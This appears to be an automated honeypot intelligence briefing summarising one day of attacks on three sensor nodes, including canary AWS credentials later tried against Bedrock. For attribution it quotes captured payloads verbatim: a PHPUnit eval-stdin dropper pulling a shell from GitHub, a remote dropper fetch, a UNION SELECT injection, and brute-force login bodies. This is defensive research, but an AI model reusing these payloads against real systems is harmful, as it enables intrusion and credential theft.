FLUX FLEET — INTEL BRIEFING №9
Period: 2026-09-03 07:34 – 2026-09-04 07:34 UTC (24h digest window, day 8 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 8-day baseline, every ≥50-event burst attributed by spot query)
The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:34 UTC on 09-03. Events from 03:34 to 07:32 UTC on 09-03 appear in both this digest and №8's data. The genuinely new data starts at 07:32 UTC on 09-03. All times are UTC.
BLUF
The canary funnel closed for the first time: 207.175.90.192 (Google LLC, BE), a METADATA-HUNT runner, minted 13 credentials on control-1 and then used 18 fleet canaries against AWS, firing 19 Converse (Bedrock) calls that Tracebit denied. This is the first observed hostile use of a fleet canary in AWS — the attribution event the fleet has waited eight days for. Mint output set a record: 107 new credentials (412 all-time) to 21 collectors, led by OMEGA-SWEEP with 49. NIGHTAGENT returned after a four-day gap with a GitHub-hosted dropper and ran a 72-minute session on both EU nodes. WP-LOGIN-BRUTE scaled from 7 to 46 source IPs, four of them IPv6, with 52 distinct credential pairs. Farm volume rose 113% on a 3,452-event config census from 87.120.104.29, a CONFIG-SWEEP actor on its second appearance.
Key Judgements
- A hostile actor used fleet canary credentials in AWS for the first time, and the target was AI inference. 207.175.90.192 collected 13 canaries on control-1 at 07:50 on 09-03 under a forged AI-crawler UA set (GPTBot/1.2, ChatGPT-User/1.0, Perplexity-User/1.0, GrokBot/1.0, OAI-SearchBot/1.4, LinkedInBot/1.0). Tracebit then recorded 19 denied
Converseoperations from 18 fleet-minted credentials. (High confidence — Tracebit alerts joined to flux mints on collector IP; the UA set matches the day-7 130.211.73.106 run and the same 131-family Vite/IMDS template) - 87.120.104.29 (Sino Worldwide Trading Ltd, NO) ran the largest single-IP config census since 08-31: 3,452 events, 1,674 paths, 117 trap families, in 16 seconds. It minted 11 canaries, then 15 rapid
/.envretries all returned upstream 400s at 05:06:29. The same IP ran a 150-event census on control-1 on day 1 (08-29) with the same forged Googlebot UA. This is CONFIG-SWEEP with a second actor, not a new kit. (High confidence — burst, UA, and day-1 history verified by direct query) - NIGHTAGENT's return brought new dropper infrastructure. 196.206.35.222 (Office National des Postes, MA) POSTed the verify body
<?php echo "NightAgent";?>and then a dropper that pulls fromraw.githubusercontent.com/nightagents/nightshellwith a fine-grained GHSAT token. Day-3 runs used inline payloads. The kit now runs a repeatable four-step loop (phpunit verify, dropper, form login, wp-batch SQLi) on both EU nodes in one session. (High confidence — both POST bodies captured verbatim at 04:06–04:45 on 09-04; 6 mints) - The XMLRPC-BRUTE scheduler stopped after its third run. Bursts at 05:16:40 and 18:25:23 on 09-02, then 08:04:19 on 09-03 — intervals of 13 h 08 m and 13 h 39 m. No fourth burst arrived by the 07:34 horizon on 09-04, over 9 h past the predicted slot. All-time census: 4,000 POSTs from the 1337 Services pair (185.19.40.36, 185.19.40.40). (Moderate confidence — three bursts are a pattern, and the stop could be a pause, not an end)
Active Campaigns (day 8 status)
⚠ CONFIG-SWEEP (87.120.104.29) — hostile, escalated, farm
- Actors: 87.120.104.29 (Sino Worldwide Trading Ltd, NO, no blocklist hit). Day-1 control-1 census (150 events, 08-29) and day-8 farm census in this window. The day-4 actor 93.152.223.194 (RMP Protection, BG) did not return.
- TTPs: Forged
Googlebot/2.1UA. Single 16-second burst (05:06:13–05:06:29 on 09-04): 1,674 paths across 117 trap families — wp-config variants,.aws/.sshcredential files (60ssh-private-key-errorhits,id_dsathroughid_ed25519variants), 22 phpMyAdmin enum paths, 77 webshell probes (/debug.php,/db_config.php,/database_config.php), git internals, Terraform and k8s manifests. 11 canaries minted in the first 9 seconds. 15 retries in the final second all hit upstream 400s. - Assessment: Same kit as the day-4 CONFIG-SWEEP census, different operator and ASN. The wordlist breadth (1,674 paths) is the largest the fleet has recorded from one IP. The mint-then-400 pattern matches the known scanner request-shape rejection. Watch for a third actor — the mechanism is commoditized.
⟳ METADATA-HUNT (GCP, forged AI-crawler UAs) — hostile, first canary use in AWS
- Actors: Two Google LLC (BE) IPs, one per node, 100 minutes apart: 207.175.90.192 on control-1 (07:50, 723 events, 130 families, 12 POSTs) and 34.38.121.96 on farm (09:30, 723 events, 131 families, 12 POSTs). Day-7's 130.211.73.106 did not return.
- TTPs: The fixed Vite/IMDS template (
/__aws_leak_probe_*__,/@fs/proc/self/environ,/@vite/env,/.mcp.json,/etc/passwd) plus cloud and AI credential paths. Forged AI-crawler UA rotation, near-identical sets on both IPs. Each IP minted 13 canaries. 207.175.90.192 then used 18 fleet credentials in AWS: 19Conversecalls, all denied, from one use IP. - Assessment: The GCP-BE pair is now a three-day pattern (130.211.73.106 on day 7, this pair on day 8) from rotating Google BE IPs against all three node profiles. The Bedrock
Conversetarget answers the fleet's design question: stolen/.envAWS credentials get tested against AI inference, not just credential-validation endpoints. Tracebit denied every call. Watch for a fourth GCP IP.
⟳ NIGHTAGENT (residential MA) — hostile, returned after 4 days
- Actors: 196.206.35.222 (Office National des Postes, MA). Same ASN family as the day-3–4 trio. 547 events across both EU nodes (farm 245, aidev 242), 04:06–05:18 on 09-04, 27 POSTs per node, 6 mints.
- TTPs: Repeating loop, both nodes, ~20-minute period. Verify POST to
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, captured verbatim:<?php echo "NightAgent";?>, then the dropper:<?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>. Thenuser=root&pass=wrongto/login/, then the wp-batch multiplex with the day-2 UNION SELECT SQLi body (author_exclude=0) UNION SELECT 999999,...HEX(CAST((SELECT 0x4f4b)AS CHAR))...), then a/.envPOST mint. - Assessment: The GitHub repo
nightagents/nightshellis new infrastructure — a named, token-protected dropper source the kit did not use on days 3–4. CVE-2017-9841 against a non-existent phpunit install, so no execution. The repo URL and GHSAT token are now search indicators for this kit anywhere in the fleet.
⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, escalated 7 → 46 IPs
- Actors: 46 distinct IPs on farm (four IPv6:
2a01:4f8:2210:2a5a::2,2001:41d0:271:aa00::,2001:41d0:404:200::4da1,2a01:4f8:272:4021::2,2607:f298:6:a027::4df:7— five with IPv6), mixed hosting across 15+ countries. Spread 04:28 on 09-03 to 03:39 on 09-04, one burst per IP. - TTPs: One
GET /wp-login.phpprobe, then 1–3 credential POSTs per IP. Identical forged UA on all:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36. 52 distinct credential pairs in 52 POSTs. Sample body, verbatim:_wpnonce=c7b1e00d5d&log=editor&pwd=editor12345&redirect_to=%2Fwp-admin%2F&rememberme=forever&testcookie=1&wp-submit=Log+In. New pairs target the farm's TLS identity:log=editor&pwd=sso%40123. Others:editor@gmail.com,editor123000,admin@gmail.com,editor123!@#. - Assessment: The wordlist grew from 5 recycled pairs to 52, and the operator now guesses node-specific usernames. The
sso@123pair is a direct response to the farm'ssso.rightabouteverything.showTLS identity — the attribution surface is also an attack surface. IPv6 sources defeat per-IPv4 rate limits. Still farm-only. No mints.
⟳ OMEGA-SWEEP (Omegatech /24) — hostile, day 8, cross-node
- Actors: 94.154.46.244 (farm, 09-03 11:42, 2,100 events), 94.154.46.247 (control, 17:01, 1,050 events), 94.154.46.243 (farm 19:55, 1,903 events; control 09-04 03:42, 1,803 events — first cross-node Omegatech IP). All-time /24 census: 6 IPs (.243–.244, .247–.250 plus prior .248/.249).
- TTPs: Forged
Googlebot/2.1UA, 107–116-family single-minute config census, SaaS/AI/cloud credential paths. 49 mints this window (.243 31, .244 12, .247 6). New control paths:/.env.php,/static/.env,/assets/.env,/htdocs/.env.production,/.poetry/.env,/ftpconfig.json. - Assessment: The /24 pool holds at least six IPs, not four. .243 ran both EU-hot and Middle East nodes within 8 hours — the operator sweeps the whole fleet now. Tracebit shows .243 with 71 mints since 09-01 and zero AWS use: hoard or untraced use.
⟳ RCE-SWARM / libredtail kit — hostile, fleet-wide, fastest rotation continues
- Actors: Seven new IPs this window (all-time 37, 1,616 events): 80.89.199.242 (control), 103.229.125.91, 94.183.227.204, 188.253.7.10, 47.253.153.204 (farm), 165.101.46.64 (aidev + control, 49 events each), 202.162.109.215 (aidev, 2 events). 49-event runs on a ~1–4 h cadence all day.
- TTPs: Unchanged kit:
libredtail-httpUA, phpuniteval-stdin.php, PHP-CGI/bin/shtraversal,/hello.world, then the dropper fetch tohttps://217.60.195.113/sh. - Assessment: Day 8 for the payload host, 37 source IPs, zero callbacks. The 2-event run from 202.162.109.215 is a new low-volume variant — bare
/bin/shtraversal only, no dropper. Kit fully commoditized.
⟳ REGISTRY-HUNT (LeakIX) — borderline, evening wave only
- Actors: 7 rotating DigitalOcean IPs (207.154.212.47, 164.92.107.174, 46.101.1.225, 164.92.244.132, 167.71.175.236, 167.99.182.39, 64.23.218.208), 19:55–20:43 on 09-03, 328 events, 8 mints. Plus
l9explore/1.2.2from 193.32.204.199: 250 events across all three nodes, now walking/backup/.git/config,/legacy/.git/config,/build/.git/config,/deploy/.git/configon aidev. - TTPs: Fixed 27-step journey: WebLogic console → Confluence → WHM/cPanel → Docker registry enum → git internals. Each
l9scanIP takes exactly 1 mint. - Assessment: Scale fell from №8's 29 IPs and 17 mints to 7 IPs and 8 mints. The registry-walk wordlist keeps growing (nested
.git/configpaths). Report the activity; distinguish it from criminal actors.
⚠ INFOCREST-KIT (23.165.56.117) — hostile, promoted to named campaign
- Actors: 23.165.56.117 (Infocrest Systems LLC, US). Second consecutive day: 684 all-time events, 6 mints, both EU nodes. This window: 412 events (farm 262, aidev 150), 36 POSTs, 13 trap families.
- TTPs: Tarpit cycling with 16 rotating stale-browser UAs, phpMyAdmin enum (10 admin-path variants), then adminer credential POSTs to
/adminer.php,/admin/adminer.php,/adminer/adminer.php— body verbatim (truncated in bodyPreview):auth%5Bdriver%5D=server&auth%5Bserver%5D=&auth%5Busername%5D=prod_rw&auth%5Bpassword%5D=Q8mIUMO3zcvuHvwxF5t6QQ&auth%5Bdb%5D=. The password rotates per session (five distinct 22-character values captured); the username staysprod_rw. - Assessment: The adminer POSTs are the new behavior: a fixed username with rotating high-entropy passwords suggests credential replay from a stolen source, not a brute force. The kit probes phpMyAdmin and adminer against the farm's hot profile. Watch for the
prod_rwusername as a fleet-wide indicator.
⚠ MEVSPACE-GITWALK (109.205.211.201) — hostile-leaning, new git-internals walker
- Actors: 109.205.211.201 (MEVSPACE sp. z o.o., AZ). First activity 09-02 (1 event per node), full run 09-03: 144 events per EU node in single-second bursts (aidev 14:01, farm 19:56), 142 distinct paths, no POSTs, no mints.
- TTPs: Stale
Firefox/78.0UA. Exhaustive.gitinternals walk:/refs/wip/wtree/refs/heads/qa,/logs/refs/remotes/origin/master,/COMMIT_EDITMSG,/hooks/pre-push.sample,refs/tags/v1.1,refs/remotes/origin/prodandorigin/qa. Matches the Jio day-2.gitrecursion shape. - Assessment: The walk reads like a git-mirror exfiltration template: it enumerates branch and tag refs by environment name (
prod,qa,staging,development). One burst per node, one day. Watch for a second run before treating it as standing.
⟳ XMLRPC-BRUTE (1337 Services) — hostile, scheduler stopped
- Actors: 185.19.40.40 (1337 Services GmbH, NL). Third 1,000-POST burst to farm
/xmlrpc.php, 08:04:19–08:05:01 on 09-03. - TTPs: Unchanged:
system.multicall, onewp.getUsersBlogscredential pair per POST. - Assessment: See Key Judgement 4. The two observed intervals (13 h 08 m, 13 h 39 m) fit a ~13 h scheduler that has now halted after three runs. If a fourth burst arrives, treat the stop as a pause and re-estimate the cadence from the gap.
Standing actors (persistence check)
- 80.94.95.211 (SS-Net, RO) — day 8 of SS-NET TOOLING presence, first aidev appearance: 105 aidev events at 02:01 on 09-04, 103 paths, 15 families, 1 mint. The actor now covers farm, control, and aidev. 6 mints all-time.
- 91.92.241.215 — new honest-UA actor:
audit-site/2.0-go (audit autorise du proprietaire), 36 events per EU node at 01:31 on 09-04, random.audit404canary paths plus an.env-variant walk, 1 farm mint. The French "authorized audit" UA with a credential walk is a hostile pattern dressed as research. Watch, do not classify benign. - 194.180.49.37 (Go-http-client) — first full-window absence after 6 days (last event 09-03 00:56, inside №8's window). 19 all-time mints, zero AWS use per Tracebit.
- Pfcloud UG (204.76.203.18) — first full-window absence after 7 days of continuous control recon (last event 09-02 18:27).
- 87.58.153.139 — new single-burst farm actor, 09-03 08:36, 71 events, 42 paths, 17 families, 1 mint, honest Chrome/124 UA,
.env/.awswordlist. Single appearance. - 45.148.10.238 — control-1, 143 events over 6 days (first 08-29), forged iPhone Safari UA,
.env-variant walk, 1 mint. Recurring low-volume collector. - Jio fuzzer (49.43.3.194) — did not return for day 3. Registry promotion condition not met; mark departed.
- 93.152.223.194 (RMP Protection) — no return on day 8 (last seen 08-31).
Benign / research (not hostile)
- Odin (
Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)) — new honest-UA prober: 6 DigitalOcean IPs, 2–9 events each,/tarpit touches plus/sdkand/odinhttpcall*callback paths. API-monitoring service shape. Add to the benign watch list pending deeper journeys. - zgrab Rhysida checks — 6 DigitalOcean IPs sent
GET /CapBack.jpgand/index.htmlwith theHost: rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onionheader (2 events per node, 09-03 18:26–22:26). Rhysida leak-site verification probes. Shallow, honestzgrab/0.xUA. Benign scanner behavior. - 80.82.77.202 / 93.174.93.12 — the fixed-cadence
/-handshake pair, unchanged (189 and 125 events across 3 nodes). - Censys / Palo Alto / WanScannerBot / GenomeCrawlerd — no hostile journeys this window.
Canary credentials
Summary
18 Tracebit alert(s) fired in the window (19 use events across 18 credentials). Fleet sensors minted 107 credentials to 21 collector IPs; 18 credential(s) reached AWS.
Use outcomes: 19 failure.
Denied operations: Converse×19.
0 call(s) succeeded: . Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 107 |
| Distinct collector IPs | 21 |
| Credentials used in AWS (alerts) | 18 |
| Credentials stolen, no observed AWS use in window | 89 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
94.154.46.243 |
control-1 | 20 | 0 | 0 | — | 71 mints since 2026-09-01 12:13 |
207.175.90.192 |
control-1 | 13 | 18 | 1 | Converse | 13 mints since 2026-09-03 07:50 |
34.38.121.96 |
canary-farm-1 | 13 | 0 | 0 | — | 13 mints since 2026-09-03 09:30 |
94.154.46.244 |
canary-farm-1 | 12 | 0 | 0 | — | 12 mints since 2026-09-03 11:42 |
87.120.104.29 |
canary-farm-1 | 11 | 0 | 0 | — | 11 mints since 2026-09-04 05:06 |
94.154.46.243 |
canary-farm-1 | 11 | 0 | 0 | — | 71 mints since 2026-09-01 12:13 |
94.154.46.247 |
control-1 | 6 | 0 | 0 | — | 6 mints since 2026-09-03 17:01 |
196.206.35.222 |
ai-devbox-1 | 3 | 0 | 0 | — | 6 mints since 2026-09-04 04:09 |
196.206.35.222 |
canary-farm-1 | 3 | 0 | 0 | — | 6 mints since 2026-09-04 04:09 |
164.92.107.174 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-03 20:39 |
164.92.107.174 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-03 20:39 |
164.92.244.132 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-03 20:42 |
167.71.175.236 |
ai-devbox-1 | 1 | 0 | 0 | — | 4 mints since 2026-08-29 10:58 |
167.99.182.39 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-01 20:50 |
176.65.148.226 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-04 02:57 |
176.65.148.71 |
control-1 | 1 | 0 | 0 | — | 2 mints since 2026-08-30 11:27 |
178.16.54.34 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-04 04:31 |
207.154.212.47 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-08-30 20:57 |
45.148.10.238 |
control-1 | 1 | 0 | 0 | — | 2 mints since 2026-08-29 22:38 |
46.101.1.225 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-03 19:55 |
64.23.218.208 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-08-31 20:35 |
80.94.95.211 |
ai-devbox-1 | 1 | 0 | 0 | — | 6 mints since 2026-08-30 21:31 |
87.58.153.139 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-03 08:36 |
91.92.241.215 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-04 01:31 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42194.180.49.37: 19 mints, 2026-08-29 20:03 → 2026-09-03 00:5693.152.223.194: 16 mints, 2026-08-29 14:11 → 2026-08-31 20:34136.110.80.233: 13 mints, 2026-08-29 14:58 → 2026-08-29 14:5834.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:3034.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:1935.247.178.64: 13 mints, 2026-08-30 11:55 → 2026-08-30 11:5594.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:4294.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:0887.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:0694.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43196.206.35.222: 6 mints, 2026-09-04 04:09 → 2026-09-04 05:18196.77.107.174: 6 mints, 2026-08-31 22:55 → 2026-08-31 23:2423.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:1580.94.95.211: 6 mints, 2026-08-30 21:31 → 2026-09-04 02:0194.154.46.247: 6 mints, 2026-09-03 17:01 → 2026-09-03 17:01167.71.175.236: 4 mints, 2026-08-29 10:58 → 2026-09-03 20:2681.172.241.94: 4 mints, 2026-08-31 07:20 → 2026-08-31 08:1194.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07157.230.19.140: 3 mints, 2026-08-30 20:46 → 2026-09-02 15:13157.245.113.227: 3 mints, 2026-08-29 10:55 → 2026-08-30 20:58165.227.39.235: 3 mints, 2026-08-31 20:17 → 2026-09-02 19:34185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:2691.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41
Canary-use attribution (briefing prose)
The 18 used credentials all trace to 207.175.90.192, the METADATA-HUNT control-1 runner (Key Judgement 1). The one use IP behind the denied Converse calls is Tracebit-side evidence; the flux side ties the mint to the forged AI-crawler UA set. The remaining 89 window credentials sit in hostile-held inventory across 20 collectors until they expire. OMEGA-SWEEP's 94.154.46.243 now holds 71 unused canaries across 3 days — the fleet's largest known hoard.
Fleet Observations
- Canary economics: 107 new mints (farm 60 / control 43 / aidev 10 per the digest table; the digest's raw 113 includes up to 6 carry-over rows from the window boundary — the all-time delta 305 → 412 fixes the new count at 107). 24 distinct collector IPs, all type
["aws"]. All-time: 412 to 136 IPs. Mint failures: 16 × 400, zero 401s. 15 of the 16 are 87.120.104.29's 05:06:29 retry burst (farm), 1 is 152.32.235.180 on control at 07:29 on 09-04 (stale Chrome/81 UA, 2 events). Root cause unchanged: upstream rejection tied to rapid-retry scanner request shapes, not key state. First credential use in AWS recorded this window (see Canary credentials). - XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — seventh consecutive clean day post-fix. 1,151 requests carried single-entry XFF.
- TLS/attribution posture: farm 521 https events against 1,807
sso.rightabouteverything.showHost events; aidev 355 https against 567inference.fapthropic.com. Control stays deliberately certless. The WP-LOGIN-BRUTEsso@123credential pair shows attackers read the TLS identity and fold it into wordlists. A Contabo rDNS Host (vmi3243483.contaboserver.net, 16 farm events) suggests one scanner resolves the farm IP to a stale rDNS name. - Volume: digest window totals 17,517 events (farm 11,115 / aidev 1,770 / control 4,632). Farm +113%: 87.120.104.29's 3,452-event census, Omegatech's 4,003 farm events, the 46-IP wp-login wave, and the LeakIX evening wave. Aidev −61%: no Omegatech aidev run and no Jio recursion this window. Control −46% against a baseline that still carries the 08-31 24,100-event burst, but control minted 43 — its second-highest day — on Omegatech and METADATA-HUNT traffic. Every ≥50-event hour is attributed: farm 08:00 = 1337 burst (1,000), farm 09:00 = 34.38.121.96 (723), farm 11:00 = Omegatech .244 (2,100), farm 19:00 = Omegatech .243 (1,903) + LeakIX, farm 04:00 (09-04) = NightAgent farm loop (219), farm 05:00 = 87.120.104.29 (3,452) + NightAgent tail; aidev 06:00 (09-03) = Bucklog .66 (275, overlap slice), aidev 10:00 = 165.101.46.64 libredtail (49) + 87.58.153.139 (64), aidev 13:00/14:00 = Infocrest adminer loop + MEVSPACE gitwalk (144), aidev 20:00 = LeakIX wave (172), aidev 02:00 (09-04) = SS-Net 80.94.95.211 (105) + Odin probes, aidev 04:00 = NightAgent aidev loop (242); control 05:00 (09-03) = Feo Prest .148 (229, overlap slice), control 07:00 = 207.175.90.192 (723), control 13:00 = 45.148.10.238 (143), control 17:00 = Omegatech .247 (1,050), control 03:00 (09-04) = Omegatech .243 (1,803). No unexplained burst remains.
- Control discovery velocity: day 8 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 unique IPs. First decline in the series. The fresh-IP differential still measures steady-state background; the long-term dataset continues.
- First-seen inventory (not a timeline): new paths resolve to the MEVSPACE git-walk (farm git-hooks and refs paths), the Omegatech control wordlist (
.poetry/.env,/ftpconfig.json,/static/.env), and l9explore's nested.git/configvariants on aidev. New UAs:audit-site/2.0-go(91.92.241.215), Odin (benign prober), and forged browser strings from the wp-login and census kits. - Digest quirk (verified this run): the digest markdown carries raw attacker-supplied control bytes (invalid UTF-8) inside quoted paths. Read the digest through a control-byte-stripped copy. The +4 h timestamp cast, single-writer DuckDB lock, and sync-arrival first-seen stamps all re-confirmed.
- Infrastructure: no fleet-side changes this cycle.
Gaps / Next Collection
- AWS use-IP identification — Tracebit recorded one use IP behind the 19 denied
Conversecalls. Pull the per-alert log detail for that IP and check whether it is a known AWS egress range or a fresh actor. This is the first hostile-use sample the fleet has; it sets the baseline for the mint → use lag (here: same window, under 24 h). - Fourth GCP-BE burst — METADATA-HUNT ran Google BE IPs on three consecutive days (130.211.73.106, then 207.175.90.192 and 34.38.121.96). A fourth burst from another
34.x/207.xBE IP confirms a persistent operator. Watch the control and farm AI-credential surfaces. - NightAgent dropper infrastructure — the
nightagents/nightshellGitHub repo and its GHSAT token are now search indicators. Check whether the repo is public, who owns it, and whether other honeypot operators report the same dropper URL. - WP-LOGIN-BRUTE continuation — 46 IPs and 52 pairs in one day is a full wordlist run, not a probe. If the IPv6 sources recur or the kit reaches aidev, treat it as a standing campaign with a measurable credential corpus.
- XMLRPC-BRUTE scheduler — no fourth burst by 07:34 on 09-04. If nothing arrives by the next digest, mark the campaign dormant at 4,000 all-time POSTs and release the tarpit budget.
- Hoarded inventory — 94.154.46.243 holds 71 unused canaries over 3 days and now sweeps both farm and control. Watch Tracebit for a use event from this collector; a hoard this size that never fires suggests resale or a batch-later workflow.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-04.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (87.120.104.29), plus 28 ad-hoc v_full queries (burst attribution, adminer bodies, NightAgent loop, wp-login wordlist census, XMLRPC burst-gap history, Omegatech /24 census, GCP mint timing, 400-failure attribution, MEVSPACE git-walk, audit-site and Odin journeys) and the Tracebit canary-section generator.